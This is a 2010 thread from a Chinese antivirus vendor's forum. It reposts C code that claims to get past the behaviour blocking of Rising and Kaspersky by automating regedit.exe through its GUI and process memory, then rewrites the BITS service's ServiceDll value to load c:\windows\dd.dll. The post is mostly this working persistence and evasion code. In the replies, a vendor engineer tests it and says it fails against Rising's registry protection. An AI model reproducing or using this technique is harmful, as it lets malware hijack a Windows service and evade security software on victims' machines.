修改注册表(暂时过瑞星和卡巴主防)

瑞星卡卡安全论坛个人产品讨论区 瑞星杀毒软件 瑞星全功能安全软件修改注册表(暂时过瑞星和卡巴主防)

	瑞星ESM助力北京石龙医院筑牢安全防线		瑞星恶意代码管理系统助金华电力提升防御能力		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		助力国家网络安全瑞星获病毒应急处理中心感谢信
	实力拉满瑞星第四十四次通过VB100测评		瑞星发布2024年六大网络安全趋势		瑞星携手中国农业大学共筑网络安全防线		人工智能在网络安全领域的风险和机遇

1 / 1 页

跳转页

[转载] 修改注册表(暂时过瑞星和卡巴主防)

特邀体验者

帖子:4192
注册: 2007-11-06
来自:

发表于： 2010-12-15 10:20 | 只看楼主 短消息资料

字号：小中大 1楼

by:careful_snow
通过Gui Hack的方式来修改注册表。。。

对付下瑞信、卡巴等主动防御的还是可以的。。。
缺点，隐蔽性不好。。。。。。

#include <windows.h>
#include <CommCtrl.h>
#include <stdio.h>
#include <TLHELP32.H>

DWORD GetProcessID(char *ProcessName)
{
PROCESSENTRY32 pe32;
pe32.dwSize=sizeof(pe32);
//获得系统内所有进程快照
HANDLE hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if(hProcessSnap==INVALID_HANDLE_VALUE)
{
printf("CreateToolhelp32Snapshot error");
return 0;
}
//枚举列表中的第一个进程
BOOL bProcess=Process32First(hProcessSnap,&pe32);
while(bProcess)
{
//比较找到的进程名和我们要查找的进程名，一样则返回进程id
if(stricmp(pe32.szExeFile,ProcessName)==0)
return pe32.th32ProcessID;
//继续查找
bProcess=Process32Next(hProcessSnap,&pe32);
}
CloseHandle(hProcessSnap);
return 0;
}

HTREEITEM FindItem(HANDLE hProcess,HWND hwnd,HTREEITEM hItem,char *szText)
{

TV_ITEM *item=(TV_ITEM*)VirtualAllocEx(hProcess,0,sizeof(TV_ITEM),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
if (item==NULL)
{
printf("alloc memory failed\n");
return NULL;
}
char *itemText=(char*)VirtualAllocEx(hProcess,0,260,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
if (item==NULL)
{
VirtualFreeEx(hProcess,item,0,MEM_RELEASE);
printf("alloc memory failed\n");
return NULL;
}
TV_ITEM initItem;
while (hItem!=NULL)
{
initItem.hItem=hItem;
initItem.mask=LVIF_TEXT;
initItem.pszText=itemText;
initItem.cchTextMax=260;
if (!WriteProcessMemory(hProcess,item,&initItem,sizeof(TV_ITEM),0))
{
VirtualFreeEx(hProcess,item,0,MEM_RELEASE);
VirtualFreeEx(hProcess,itemText,0,MEM_RELEASE);
printf("WriteProcessMemory failed");
return NULL;
}
if (!TreeView_GetItem(hwnd,item))
{
VirtualFreeEx(hProcess,item,0,MEM_RELEASE);
VirtualFreeEx(hProcess,itemText,0,MEM_RELEASE);
printf("get item failed\n");
return NULL;
}
DWORD dwRead;
char itemName[260];
if(!ReadProcessMemory(hProcess,itemText,itemName,260,&dwRead))
{
VirtualFreeEx(hProcess,item,0,MEM_RELEASE);
VirtualFreeEx(hProcess,itemText,0,MEM_RELEASE);
printf("read item name failed\n");
return NULL;
}
if (stricmp(itemName,szText)==0)
{
VirtualFreeEx(hProcess,item,0,MEM_RELEASE);
VirtualFreeEx(hProcess,itemText,0,MEM_RELEASE);
return hItem;
}

hItem=TreeView_GetNextSibling(hwnd,hItem);
}
VirtualFreeEx(hProcess,item,0,MEM_RELEASE);
VirtualFreeEx(hProcess,itemText,0,MEM_RELEASE);
return NULL;

}

BOOL SelectDestTreeItem()
{
DWORD pid=GetProcessID("regedit.exe");
if (pid==0)
{
printf("the process not exist\n");
return FALSE;
}
HANDLE hProcess=OpenProcess(PROCESS_ALL_ACCESS,TRUE,pid);
if (hProcess==NULL)
{
printf("open process failed\n");
return FALSE;
}

HWND hwnd=::FindWindowEx(NULL,NULL,"RegEdit_RegEdit",NULL);
if(hwnd==NULL)
{
printf("find regedit windows fialed\n");
CloseHandle(hProcess);
return FALSE;
}
hwnd=FindWindowEx(hwnd,NULL,"SysTreeView32",NULL);
if (hwnd==NULL)
{
CloseHandle(hProcess);
return FALSE;
}
HTREEITEM hItem=TreeView_GetRoot(hwnd);
TreeView_SelectItem(hwnd,hItem);
TreeView_Expand(hwnd,hItem,TVE_EXPAND);
hItem=TreeView_GetChild(hwnd,hItem);
if (hItem==NULL)
{
CloseHandle(hProcess);
return FALSE;
}

hItem=FindItem(hProcess,hwnd,hItem,"HKEY_LOCAL_MACHINE");
if (hItem==NULL)
{
printf("get HKEY_LOCAL_MACHINE failed");
CloseHandle(hProcess);
return FALSE;
}
TreeView_SelectItem(hwnd,hItem);
TreeView_Expand(hwnd,hItem,TVE_EXPAND);
hItem=TreeView_GetChild(hwnd,hItem);
if (hItem==NULL)
{
CloseHandle(hProcess);
return FALSE;
}

hItem=FindItem(hProcess,hwnd,hItem,"SYSTEM");
if (hItem==NULL)
{
printf("get SYSTEM failed");
CloseHandle(hProcess);
return FALSE;
}
TreeView_SelectItem(hwnd,hItem);
TreeView_Expand(hwnd,hItem,TVE_EXPAND);
hItem=TreeView_GetChild(hwnd,hItem);
if (hItem==NULL)
{
CloseHandle(hProcess);
return FALSE;
}

hItem=FindItem(hProcess,hwnd,hItem,"CurrentControlSet");
if (hItem==NULL)
{
printf("get CurrentControlSet failed");
CloseHandle(hProcess);
return FALSE;
}
TreeView_SelectItem(hwnd,hItem);
TreeView_Expand(hwnd,hItem,TVE_EXPAND);
hItem=TreeView_GetChild(hwnd,hItem);
if (hItem==NULL)
{
CloseHandle(hProcess);
return FALSE;
}

hItem=FindItem(hProcess,hwnd,hItem,"Services");
if (hItem==NULL)
{
printf("get Services failed");
CloseHandle(hProcess);
return FALSE;
}
TreeView_SelectItem(hwnd,hItem);
TreeView_Expand(hwnd,hItem,TVE_EXPAND);
hItem=TreeView_GetChild(hwnd,hItem);
if (hItem==NULL)
{
CloseHandle(hProcess);
return FALSE;
}

hItem=FindItem(hProcess,hwnd,hItem,"BITS");
if (hItem==NULL)
{
printf("get dmboot failed");
CloseHandle(hProcess);
return FALSE;
}
TreeView_SelectItem(hwnd,hItem);
TreeView_Expand(hwnd,hItem,TVE_EXPAND);
hItem=TreeView_GetChild(hwnd,hItem);
if (hItem==NULL)
{
CloseHandle(hProcess);
return FALSE;
}

hItem=FindItem(hProcess,hwnd,hItem,"Parameters");
if (hItem==NULL)
{
printf("get dmboot failed");
CloseHandle(hProcess);
return FALSE;
}
TreeView_SelectItem(hwnd,hItem);
TreeView_Expand(hwnd,hItem,TVE_EXPAND);
hItem=TreeView_GetChild(hwnd,hItem);
if (hItem==NULL)
{
CloseHandle(hProcess);
return FALSE;
}
CloseHandle(hProcess);
return TRUE;
}

BOOL OpenDestItemEditDlg(char *szText)
{
DWORD pid=GetProcessID("regedit.exe");
if (pid==0)
{
printf("the process not exist\n");
return FALSE;
}
HANDLE hProcess=OpenProcess(PROCESS_ALL_ACCESS,TRUE,pid);
if (hProcess==NULL)
{
CloseHandle(hProcess);
printf("open process failed\n");
return FALSE;
}
HWND hwnd=::FindWindowEx(NULL,NULL,"RegEdit_RegEdit",NULL);
if(hwnd==NULL)
{
printf("find regedit windows fialed\n");
CloseHandle(hProcess);
return FALSE;
}
hwnd=FindWindowEx(hwnd,NULL,"SysListView32",NULL);
if (hwnd==NULL)
{
CloseHandle(hProcess);
return FALSE;
}
LV_ITEM *item=(LV_ITEM*)VirtualAllocEx(hProcess,0,sizeof(LV_ITEM),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
if (item==NULL)
{
CloseHandle(hProcess);
printf("alloc memory failed\n");
return FALSE;
}
char *keyVauleName=(char*)VirtualAllocEx(hProcess,0,260,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
if (keyVauleName==NULL)
{

VirtualFreeEx(hProcess,item,0,MEM_RELEASE);
CloseHandle(hProcess);
printf("alloc memory failed\n");
return FALSE;
}

int count=ListView_GetItemCount(hwnd);
printf("count:%d\n",count);
char retKeyVauleName[260]={0};
DWORD dwRead;
LV_ITEM initItem={0};
initItem.cchTextMax=260;
initItem.iSubItem=0;
initItem.pszText=keyVauleName;
BOOL bFind=FALSE;

for (int index=0;index<count;index++)
{
if (!WriteProcessMemory(hProcess,item,&initItem,sizeof(LV_ITEM),0))
{
VirtualFreeEx(hProcess,item,0,MEM_RELEASE);
VirtualFreeEx(hProcess,keyVauleName,0,MEM_RELEASE);
CloseHandle(hProcess);
printf("WriteProcessMemory failed");
return FALSE;
}
SendMessage(hwnd,LVM_GETITEMTEXT,(WPARAM)index,(LPARAM)item);
if(!ReadProcessMemory(hProcess,keyVauleName,retKeyVauleName,260,&dwRead))
{
VirtualFreeEx(hProcess,item,0,MEM_RELEASE);
VirtualFreeEx(hProcess,keyVauleName,0,MEM_RELEASE);
CloseHandle(hProcess);
printf("read item name failed\n");
return FALSE;
}
if(stricmp(retKeyVauleName,szText)==0)
{
printf("%s\n",retKeyVauleName);
bFind=TRUE;
break;
}

}
if (!bFind)
{
VirtualFreeEx(hProcess,item,0,MEM_RELEASE);
VirtualFreeEx(hProcess,keyVauleName,0,MEM_RELEASE);
CloseHandle(hProcess);
printf("not find\n");
return FALSE;
}
VirtualFreeEx(hProcess,item,0,MEM_RELEASE);
VirtualFreeEx(hProcess,keyVauleName,0,MEM_RELEASE);

PPOINT point=(PPOINT)VirtualAllocEx(hProcess,0,sizeof(POINT),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
if (item==NULL)
{
CloseHandle(hProcess);
printf("alloc memory failed\n");
return FALSE;
}
POINT retPoint={0};

ListView_GetItemPosition(hwnd,index,point);
if(!ReadProcessMemory(hProcess,point,&retPoint,260,&dwRead))
{
VirtualFreeEx(hProcess,point,0,MEM_RELEASE);
CloseHandle(hProcess);
printf("read point name failed\n");
return FALSE;
}
printf("x:%d,y:%d\n",retPoint.x,retPoint.y);
VirtualFreeEx(hProcess,point,0,MEM_RELEASE);

PostMessage(hwnd,WM_LBUTTONDOWN,0,MAKELPARAM(retPoint.x+3,retPoint.y+1));
PostMessage(hwnd,WM_LBUTTONUP,0,MAKELPARAM(retPoint.x+3,retPoint.y+1));
PostMessage(hwnd,WM_LBUTTONDBLCLK,0,MAKELPARAM(retPoint.x+3,retPoint.y+1));
/* SetForegroundWindow(hwnd);*/

CloseHandle(hProcess);

return 0;

}

BOOL EditKeyVaule(char *keyVaule)
{
HWND hwnd=NULL;
do
{
hwnd=::FindWindowEx(NULL,NULL,NULL,"编辑字符串");

} while (hwnd==NULL);

HWND hKeyVaule=NULL;
do
{
hKeyVaule=FindWindowEx(hwnd,NULL,"Edit",NULL);

} while (keyVaule==NULL);

SendMessage(hKeyVaule,WM_SETTEXT,0,(LPARAM)keyVaule);
HWND hOk=NULL;
do
{
hOk=FindWindowEx(hwnd,NULL,"Button","确定");

} while (hOk==NULL);

PostMessage(hOk,WM_LBUTTONDOWN,0,0);
PostMessage(hOk,WM_LBUTTONDOWN,0,0);
PostMessage(hOk,WM_LBUTTONUP,0,0);

// SetWindowText(hwnd,keyVaule);
return TRUE;

}

int main(int argc, char* argv[])
{

WinExec("regedit.exe",1);
Sleep(2000);
if (SelectDestTreeItem())
{
printf("ok\n");
}
Sleep(3000);

OpenDestItemEditDlg("ServiceDll");
Sleep(3000);
EditKeyVaule("c:\\windows\\dd.dll");
return 0;
}

用户系统信息：Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.33 Safari/534.3 SE 2.X MetaSr 1.0

分享到：

shulun743 特邀体验者帖子:4192 注册: 2007-11-06 来自:	发表于： 2010-12-15 10:21 \| 只看楼主短消息资料字号：小中大 2楼回复：修改注册表(暂时过瑞星和卡巴主防) 刚从网上看到的，不知对2011有效吗？
shulun743 特邀体验者帖子:4192 注册: 2007-11-06 来自:

瑞星工程师16 在线技术支持工程师帖子:9362 注册: 2008-09-08 来自:	发表于： 2010-12-15 11:12 \| 短消息资料字号：小中大 3楼回复：修改注册表(暂时过瑞星和卡巴主防) 您提供的代码已提交相关部门测试，有测试结果会尽快和您联系。感谢您对瑞星的支持！
瑞星工程师16 在线技术支持工程师帖子:9362 注册: 2008-09-08 来自:

瑞星工程师16 在线技术支持工程师帖子:9362 注册: 2008-09-08 来自:	发表于： 2011-01-03 15:41 \| 短消息资料字号：小中大 4楼回复：修改注册表(暂时过瑞星和卡巴主防) 经测试，此代码无法通过瑞星的注册表保护
瑞星工程师16 在线技术支持工程师帖子:9362 注册: 2008-09-08 来自:

<<上一主题|下一主题>>

1 / 1 页

跳转页

瑞星卡卡安全论坛个人产品讨论区瑞星杀毒软件瑞星全功能安全软件 修改注册表(暂时过瑞星和卡巴主防)

[转载] 修改注册表(暂时过瑞星和卡巴主防)

修改注册表(暂时过瑞星和卡巴主防)

回复：修改注册表(暂时过瑞星和卡巴主防)

回复：修改注册表(暂时过瑞星和卡巴主防)

回复：修改注册表(暂时过瑞星和卡巴主防)

瑞星卡卡安全论坛个人产品讨论区瑞星杀毒软件瑞星全功能安全软件修改注册表(暂时过瑞星和卡巴主防)